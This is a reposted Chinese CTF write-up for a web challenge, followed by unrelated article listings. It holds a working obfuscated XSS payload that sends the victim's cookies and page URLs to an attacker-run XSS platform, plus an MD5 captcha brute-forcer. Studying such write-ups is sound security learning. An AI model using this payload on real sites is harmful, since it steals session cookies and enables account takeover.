[CISCN2019 华东北赛区]Web2

[CISCN2019 华东北赛区]Web2

news2025/10/31 18:11:53

[CISCN2019 华东北赛区]Web2

随便注册一个登录，发现
还有反馈页面，一看就知道大概率是xss，应该是为了得到管理员cookie
扫描了一下，果然有admin.php后台登录
buu可以连接访问外网了，所以内部的xss平台关闭了，使用自己搭建的莲花平台，不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  
  
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

然后提交文章，得到连接，来到反馈页面
说了要将域名改成web
验证码

import hashlib
num=input()
for i in range(999999,10000000):
    m=hashlib.md5()
    m.update(str(i).encode())
    m=m.hexdigest()
    if m[:6]==num:
        print(i)
        break

然后我得不到管理员的cookie啊，算了，反正思路是这样的，有没有大佬知道为什么的
得到phpsessid之后登录，然后就是一个简单的sql注入

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1547493.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

【P1328】[NOIP2014 提高组] 生活大爆炸版石头剪刀布

【P1328】[NOIP2014 提高组] 生活大爆炸版石头剪刀布

[NOIP2014 提高组] 生活大爆炸版石头剪刀布题目背景 NOIP2014 提高组 D1T1 题目描述石头剪刀布是常见的猜拳游戏：石头胜剪刀，剪刀胜布，布胜石头。如果两个人出拳一样，则不分胜负。在《生活大爆炸》第二季第 8 集中出现了一种…

阅读更多...

【笔记】OpenHarmony设备开发：搭建开发环境（Ubuntu 20.04，VirtualBox 7.0.14）

【笔记】OpenHarmony设备开发：搭建开发环境（Ubuntu 20.04，VirtualBox 7.0.14）

参考：搭建开发环境（HarmonyOS Device） Note：Windows系统虚拟机中Ubuntu系统安装完成后，根据指导完成Ubuntu20.04基础环境配置（HarmonyOS Connect 开发工具系列课） 系统要求 Windows系统要求&…

阅读更多...

Warning logs 2024-03-23

Warning logs 2024-03-23

给旧的笔记本安装ubuntu系统，并实现ssh远程连接 1、下载ubuntu系统 ubuntu下载链接选择带桌面版本 2、准备U盘 3、使用UltraISO制作启动盘使用UltraISO，打开刚才下载的ubuntu**.iso文件 4、进入BIOS，选择U盘启动 5、Warning 1 invali…

阅读更多...

[Android]创建Google Play内购aab白包

[Android]创建Google Play内购aab白包

开发时需要调试Google内购，需要先往Google商店传一个白包上去。确定包名，然后进行内购产品创建。 1.创建一个空项目，填写正式名称和正式包名。如果你只是为一个测试开发账号打白包，然后进行内购测试，这时包名随便写…

阅读更多...

深度学习中常用计算距离的几种算法对比与python实现

深度学习中常用计算距离的几种算法对比与python实现

前言距离度量在许多机器学习算法中扮演着至关重要的角色，无论是监督学习还是无监督学习。选择适当的距离度量可以显著影响模型的性能。在高维数据集中，欧几里得距离可能会受到所谓的“维度诅咒”的影响，因为随着维度的增加，数…

阅读更多...

如何打包springboot项目并部署服务器

如何打包springboot项目并部署服务器

创建一个springboot项目，先写一个接口，我这里是dabaimao/jiekou,启动访问在pom中加上maven插件 <build><plugins><plugin><groupId>org.springframework.boot</groupId><artifactId>spring-boot-maven-plugin<…

阅读更多...

Qt 图形视图 /图形视图框架坐标系统的设计理念和使用方法

Qt 图形视图 /图形视图框架坐标系统的设计理念和使用方法

文章目录概述Qt 坐标系统图形视图的渲染过程Item图形项坐标系Scene场景坐标系View视图坐标系map坐标映射场景坐标转项坐标视图坐标转图形项坐标图形项之间的坐标转换其他概述 The Graphics View Coordinate System 图形视图坐标系统是Qt图形视图框架的重要组成部分&#xf…

阅读更多...

【win10 win11添加右键】git bash

【win10 win11添加右键】git bash

打开注册表编辑器。按下Win键 R，然后输入”regedit”并按下回车键来打开注册表编辑器。计算机\HKEY_CLASSES_ROOT\Directory\Background\shell\git_bash\command2. 导航到注册表路径：依次展开”HKEY_CLASSES_ROOT\Directory\Background\shell”。右键…

阅读更多...

Git入门（Git快速下载，安装，配置，远程仓库，本地仓库，IDEA提交代码，VScode提交代码使用方案一体）

Git入门（Git快速下载，安装，配置，远程仓库，本地仓库，IDEA提交代码，VScode提交代码使用方案一体）

Git快速下载通过阿里镜像可以自由挑选版本并快速下载CNPM Binaries Mirrorhttp://npm.taobao.org/mirrors/git-for-windows/ 这里安装最新版本下载安装文件安装完后双击文件即可开始安装git 安装 git的安装傻瓜式Next即可配置打开git：桌面空白处右击&#…

阅读更多...

FTLK-1.3.9的编译和使用

FTLK-1.3.9的编译和使用

文章目录 1. FTLK-1.3.9源码下载 1. FTLK-1.3.9源码下载前往FTLK官网下载FTLK-1.3.9源码 *

阅读更多...

ARM IHI0069F GIC architecture specification (4)

ARM IHI0069F GIC architecture specification (4)

1.3 支持的配置和兼容性在 Armv8-A 中，EL2 和 EL3 是可选的，PE 可以支持一个、两个或都不支持这些异常级别。然而： • PE 要求EL3 支持安全和非安全状态。 • PE 需要EL2 来支持虚拟化。 • 如果未实施EL3，则只有一个安全状态。…

阅读更多...

信号处理--基于DEAP数据集的情绪分类的典型深度学习模型构建

信号处理--基于DEAP数据集的情绪分类的典型深度学习模型构建

关于本实验采用DEAP情绪数据集进行数据分类任务。使用了三种典型的深度学习网络：2D 卷积神经网络；1D卷积神经网络GRU； LSTM网络。工具数据集 DEAP数据图片来源： DEAP: A Dataset for Emotion Analysis using Physiological…

阅读更多...

【二】TensorFlow神经网络模型构建之卷积函数

【二】TensorFlow神经网络模型构建之卷积函数

卷积函数是构建神经网络的重要支架，是在一批图像上扫描的二维过滤器。 tf.nn.convolution(input,filter,padding,stridesNone,dilation_rateNone,nameNone,data_formatNone)该函数计算N维卷积的和。tf.nn.conv2d(input,filter,padding,strides,use_cudnn_on_gpuNon…

阅读更多...

【卫星影像三维重建】有理函数模型库-rpcm

【卫星影像三维重建】有理函数模型库-rpcm

卫星成像模型rpcm库使用 1.介绍1.1 卫星成像模型1.2 rpcm库 2.安装2.1 依赖库2.2 安装 3.用法3.1 投影3.2 定位3.3 影像裁剪crop3.3.1 使用说明3.3.2 具体使用 3.4 footprint3.5 angle影像的成像夹角 4.参考 1.介绍 1.1 卫星成像模型卫星遥感影像的成像模型是描述影像与地面…

阅读更多...

从零开始搭建游戏服务器第七节创建GameServer

从零开始搭建游戏服务器第七节创建GameServer

目录前言正文创建GameServer模块修改配置创建NettyClient连接到登录服登录服修改创建协议游戏服注册到登录服总结前言上一节我们使用自定义注解反射简化了协议解包和逻辑处理分发流程。那么到了这里登录服登录服的架构已经搭建的差不多了，一些比较简单的、并发…

阅读更多...

pyhive入门介绍和实例分析（探索票价与景点评分之间是否存在相关性）

pyhive入门介绍和实例分析（探索票价与景点评分之间是否存在相关性）

介绍 PyHive 是一组 Python DB-API 和 SQLAlchemy 接口，可用于 Presto 和 Hive。它为 Python 提供了一个与 Presto 和 Hive 进行交互的平台，使得数据分析师和工程师可以更方便地进行数据处理和分析。以下是使用 PyHive 进行数据分析时需要注意的几点&…

阅读更多...

HWOD：名字的漂亮度

HWOD：名字的漂亮度

一、题目描述给出一个字符串，该字符串仅由小写字母组成，定义这个字符串的漂亮度是其所有字母漂亮度的总和每个字母都有一个漂亮度，范围在1到26之间。没有任何两个不同字母拥有相同的漂亮度。字母忽略大小写。给出多个字符串&#xff…

阅读更多...

面试篇：HashMap

面试篇：HashMap

1.问：了解过红黑树吗？它有什么性质？ 答：红黑树是一种自平衡的二叉搜索树，他的查找，添加和删除的时间复杂度都为O(logN)。他有以下五种性质： 1.红黑树的节点只有红色或者黑色两种颜色 2.红黑树的…

阅读更多...

java Web线上网游商品交易平台用eclipse定制开发mysql数据库BS模式java编程jdbc

java Web线上网游商品交易平台用eclipse定制开发mysql数据库BS模式java编程jdbc

一、源码特点 jsp线上网游商品交易平台是一套完善的web设计系统，对理解JSP java SERLVET mvc编程开发语言有帮助，系统具有完整的源代码和数据库，系统主要采用B/S模式开发。开发环境为TOMCAT7.0,eclipse开发，数据库为Mysql5.0…

阅读更多...

Charles for Mac 强大的网络调试工具

Charles for Mac 强大的网络调试工具

Charles for Mac是一款功能强大的网络调试工具，可以帮助开发人员和测试人员更轻松地进行网络通信测试和调试。以下是一些Charles for Mac的主要特点： 软件下载：Charles for Mac 4.6.6注册激活版流量截获：Charles可以截获和分析通…

阅读更多...

推荐文章

最新文章